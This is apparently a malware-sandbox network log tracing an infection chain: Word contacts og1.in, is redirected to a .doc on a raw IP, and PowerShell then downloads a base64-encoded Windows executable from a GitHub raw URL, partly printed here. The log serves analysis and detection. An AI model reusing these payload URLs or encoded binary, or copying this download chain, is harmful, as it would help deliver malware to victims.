                                                                                                                        Host: geoplugin.net
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Sep 30, 2024 15:00:27.814116001 CEST1170INHTTP/1.1 200 OK
                                                                                                                        date: Mon, 30 Sep 2024 13:00:27 GMT
                                                                                                                        server: Apache
                                                                                                                        content-length: 962
                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                        cache-control: public, max-age=300
                                                                                                                        access-control-allow-origin: *
                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.2249163172.67.216.2444433364C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:00 UTC128OUTOPTIONS / HTTP/1.1
                                                                                                                        User-Agent: Microsoft Office Protocol Discovery
                                                                                                                        Host: og1.in
                                                                                                                        Content-Length: 0
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-09-30 13:00:01 UTC765INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:01 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        allow: GET,HEAD
                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-dns-prefetch-control: off
                                                                                                                        x-download-options: noopen
                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhS22PiSKAje2PbeaO6qNypPEwOBqLT6sTN9cjUfFg%2BWo2iScngoaxQWDw3Bp7qZkPBrylZwtzNMwBI1SjKO98nGhU1%2BGlvzQPwKWJtL3cPKEwQWV%2BdRTMI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cb464b62d670c7e-EWR
                                                                                                                        2024-09-30 13:00:01 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                                        Data Ascii: 8GET,HEAD
                                                                                                                        2024-09-30 13:00:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.2249164104.21.78.544433364C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:02 UTC113OUTHEAD /S7UYq0 HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                        Host: og1.in
                                                                                                                        2024-09-30 13:00:02 UTC949INHTTP/1.1 302 Found
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:02 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Content-Length: 196
                                                                                                                        Connection: close
                                                                                                                        location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                        vary: Accept
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-dns-prefetch-control: off
                                                                                                                        x-download-options: noopen
                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjCy%2FRsigQKezSqyMBGR1k0PvGyXxaFkbivLVxXPf9z05tRbtHcAbhihDmDuqWQJPIAS46DkU%2FeZsIiiMjJQt4b9QIzq8HN1GYnzavv8nw%2BczWsK%2FK2UK%2Fk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cb464c0f8cf4405-EWR


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        2192.168.2.2249165172.67.216.244443
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:06 UTC123OUTOPTIONS / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                        translate: f
                                                                                                                        Host: og1.in
                                                                                                                        2024-09-30 13:00:07 UTC775INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:07 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        allow: GET,HEAD
                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-dns-prefetch-control: off
                                                                                                                        x-download-options: noopen
                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDTazgvZEG4w6H0I%2B695y%2BTGw%2FimcpeyEndiBSU9nI05%2Ba79w7%2Bk%2BeBfO%2F8PHX68gpMg%2BHmFbpQ44MdveOJwsawtsm7YdRNtc0aBZw6WPS4KKuSI8X4d02A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cb464defb629e02-EWR
                                                                                                                        2024-09-30 13:00:07 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                                        Data Ascii: 8GET,HEAD
                                                                                                                        2024-09-30 13:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        3192.168.2.2249166104.21.78.54443
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:08 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 67 31 2e 69 6e 0d 0a 0d 0a
                                                                                                                        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: og1.in
                                                                                                                        2024-09-30 13:00:09 UTC796INHTTP/1.1 404 Not Found
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:08 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-dns-prefetch-control: off
                                                                                                                        x-download-options: noopen
                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biWt27U30cDbQpHFYU2uuX7KFKq1aQXK0JV7jWQVWugl4vE17EeCyrZWCf98lk5ypubXlkeoBwI1uZ%2BirEVtURtXaly76oO6n0wcra0ELNjBhrodR6SMQFA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cb464e7d85c1889-EWR
                                                                                                                        2024-09-30 13:00:09 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                        Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                                                                        2024-09-30 13:00:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        4192.168.2.2249167104.21.78.54443
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:09 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 67 31 2e 69 6e 0d 0a 0d 0a
                                                                                                                        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: og1.in
                                                                                                                        2024-09-30 13:00:10 UTC802INHTTP/1.1 404 Not Found
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:10 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-dns-prefetch-control: off
                                                                                                                        x-download-options: noopen
                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCpAmTZTgdeE0h3Su7CD8bdAY611yohjIEWh0aSjSEG%2FW%2FFxEjQndT06%2FwHwrwECWTeT6je5mcMXFhgAcLom0%2Fu9aN2dSTFiJkC0cp9GXq3GLm3TQqaH0NQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cb464f01f018c9b-EWR
                                                                                                                        2024-09-30 13:00:10 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                        Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                                                                        2024-09-30 13:00:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.2249168172.67.216.2444433364C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:11 UTC343OUTGET /S7UYq0 HTTP/1.1
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                        UA-CPU: AMD64
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Host: og1.in
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-09-30 13:00:11 UTC957INHTTP/1.1 302 Found
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:11 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Content-Length: 196
                                                                                                                        Connection: close
                                                                                                                        location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                        vary: Accept
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-dns-prefetch-control: off
                                                                                                                        x-download-options: noopen
                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                        x-xss-protection: 0
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQkv2fVL9LZcfm0uWfKU3D9rBGuycsW4XpxYt9L2gRu0WYywBMt884FGexiU45cNj0A33AGc04bbh2EJ7hBx5W6ZxuUUnW74JgNvSiICuTWVZrozlZv92cU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cb464f9b97b7274-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        2024-09-30 13:00:11 UTC196INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 39 31 2e 31 33 34 2e 39 36 2e 31 37 37 2f 38 30 2f 75 63 2f 73 65 65 74 68 65 64 6f 6d 61 69 6e 64 73 6b 69 6c 6c 74 65 63 68 6e 6f 6c 6f 67 79 77 68 69 63 68 63 72 65 61 74 65 64 6e 69 63 65 70 65 72 73 6f 6e 65 6e 74 69 72 65 6c 69 66 65 74 6f 67 65 74 62 6d 65 62 61 63 6b 77 69 74 68 6e 65 77 74 68 69 6e 67 73 77 69 74 68 69 63 68 68 6f 6e 65 73 74 74 68 69 6e 67 73 61 6c 77 61 79 73 77 61 6e 74 6f 62 65 5f 5f 5f 5f 5f 5f 73 65 69 73 63 75 74 65 62 61 62 79 67 69 72 6c 65 76 65 72 2e 64 6f 63
                                                                                                                        Data Ascii: Found. Redirecting to http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.2249170172.67.216.2444433364C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:14 UTC132OUTHEAD /S7UYq0 HTTP/1.1
                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                        Host: og1.in
                                                                                                                        Content-Length: 0
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-09-30 13:00:15 UTC947INHTTP/1.1 302 Found
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:14 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Content-Length: 196
                                                                                                                        Connection: close
                                                                                                                        location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                        vary: Accept
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-dns-prefetch-control: off
                                                                                                                        x-download-options: noopen
                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ieab40CFbwxpgEaenF8aD9tXWZXhFCkILiLh46GgjFYI4%2BBa0%2FVQJ4e1DsfX6NGtatcEtWiP%2FuD1UNRoLLVKR5NOxghFRysWaXSk9H7BVe%2BiVqoKQur7lks%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cb4650d4d0732ca-EWR


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.2249172185.199.109.1334434032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-09-30 13:00:21 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-09-30 13:00:22 UTC905INHTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 2935468
                                                                                                                        Cache-Control: max-age=300
                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-GitHub-Request-Id: ABD1:229101:101D15E:11BA429:66FAA0E5
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:22 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-nyc-kteb1890091-NYC
                                                                                                                        X-Cache: MISS
                                                                                                                        X-Cache-Hits: 0
                                                                                                                        X-Timer: S1727701222.948364,VS0,VE83
                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Fastly-Request-ID: 69cecce4e5c73f4db61382786a93d6a7a2bce07f
                                                                                                                        Expires: Mon, 30 Sep 2024 13:05:22 GMT
                                                                                                                        Source-Age: 0
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                        Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                        Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                        Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
